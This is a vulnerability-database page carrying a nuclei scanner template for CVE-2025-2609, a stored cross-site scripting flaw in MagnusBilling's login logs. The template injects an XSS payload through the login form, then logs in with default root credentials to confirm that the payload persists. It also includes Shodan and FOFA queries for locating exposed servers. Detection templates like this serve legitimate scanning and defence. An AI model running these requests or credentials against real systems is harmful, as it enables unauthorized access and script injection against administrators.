Lucene search
K

MagnusBilling Login Logs - Cross-Site Scripting

๐Ÿ—“๏ธย 06 Jul 2026ย 03:02:03Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 31ย Views

High severity Cross-Site Scripting vulnerability in MagnusBilling allows unauthenticated access to logs.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-2609
21 Mar 202523:19
โ€“circl
CNNVD
MagnusBilling ๅฎ‰ๅ…จๆผๆดž
21 Mar 202500:00
โ€“cnnvd
CVE
CVE-2025-2609
21 Mar 202522:41
โ€“cve
Cvelist
CVE-2025-2609 MagnusBilling Stored Cross-Site Scripting in Login Logs
21 Mar 202522:41
โ€“cvelist
EUVD
EUVD-2025-7200
3 Oct 202520:07
โ€“euvd
NVD
CVE-2025-2609
21 Mar 202523:15
โ€“nvd
RedhatCVE
CVE-2025-2609
23 Mar 202523:14
โ€“redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-2609
21 Mar 202500:00
โ€“vulncheck_kev
Vulnrichment
CVE-2025-2609 MagnusBilling Stored Cross-Site Scripting in Login Logs
21 Mar 202522:41
โ€“vulnrichment
id: CVE-2025-2609

info:
  name: MagnusBilling Login Logs - Cross-Site Scripting
  author: DhiyaneshDK
  severity: high
  description: |
    Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling login logging allows unauthenticated users to store HTML content in the viewable log component accessible at /mbilling/index.php/logUsers/read" cross-site scripting This vulnerability is associated with program files protected/components/MagnusLog.Php.This issue affects MagnusBilling- through 7.3.0.
  impact: |
    Unauthenticated attackers can inject malicious HTML and JavaScript into login logs that persist and execute when administrators view the log component, potentially leading to session hijacking and privilege escalation.
  remediation: |
    Upgrade to MagnusBilling version 7.3.1 or later that properly sanitizes input in the login logging component.
  reference:
    - https://vulncheck.com/advisories/magnusbilling-logs-xss
    - https://chocapikk.com/posts/2025/magnusbilling/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2609
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-2609
    cwe-id: CWE-79
    epss-score: 0.01098
    epss-percentile: 0.61623
    cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: magnussolution
    product: magnusbilling
    shodan-query: html:"MagnusBilling"
    fofa-query: body="MagnusBilling"
  tags: cve,cve2025,mbilling,stored,xss,authenticated,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "root"
  password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus

http:
  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=<img src=x onerror=alert(document.domain)>&password=random

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "combination is invalid")'
          - '!contains(body, "Trying SQL inject")'
        condition: and
        internal: true

  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;

        user={{username}}&password={{password}}&key=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "id_agent")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/logUsers/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "User: <img src=x onerror=alert(document.domain)>")'
        condition: and
# digest: 4b0a0048304602210081b0d729337bc89eeaf210d1bd4916e71d8469e06695b504a8ecff64f22795e4022100ea352acf12ceeedd8ff814a2fbdf3c08548a2a50a52e6b036f615b79136b90fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.1 - 8.2
EPSS0.01098
SSVC
31